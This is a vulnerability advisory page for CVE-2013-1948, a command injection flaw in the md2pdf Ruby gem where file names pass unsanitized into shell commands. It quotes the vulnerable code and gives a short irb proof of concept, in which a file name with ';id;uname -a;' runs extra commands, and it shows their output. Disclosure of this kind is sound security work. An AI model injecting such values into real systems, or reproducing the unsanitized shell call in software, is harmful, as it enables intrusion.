Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2013-1948

Publish Date: 15 Apr 2013

Source

                Remote command injection md2pdf ruby gem
4/10/2013

Description: "creates pdf documents from markdown documents"

https://rubygems.org/gems/md2pdf

In md2pdf/converter.rb we see user supplied input being passed to the command line with out proper sanitization.

 12       shell.exec("pandoc#{options} #{input_filename} -o #{output_filename}")

23 shell.exec("pdftk #{temp_filename} multibackground #{background_path} output #{output_filename}")

Where exec is defined as the following:

 37     def exec(command_line)
 38       require 'open3'
 39       stdin, stdout, stderr = Open3.popen3(command_line)
 40       return stdout.read
 41     end

PoC Notes:

irb(main):001:0&gt; require 'open3'
=&gt; true
irb(main):002:0&gt; stdin, stdout, stderr = Open3.popen3('pdfcnv filename;id;uname -a;.pdft')
=&gt; [#, #, #]
irb(main):003:0&gt; puts stdout.read
uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),117(sambashare)
Linux underfl0w 3.2.0-39-virtual #62-Ubuntu SMP Wed Feb 27 22:45:45 UTC 2013 i686 athlon i386 GNU/Linux
=&gt; nil

http://vapid.dhs.org/advisories/md2pdf-remote-exec.html


This vulnerability has been assigned: CVE-2013-1948

Larry W. Cashdollar
@_larry0



CVE-2013-1948
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Ruby Gem md2pdf Command Injection

Vulmon Search

About

Products

Connect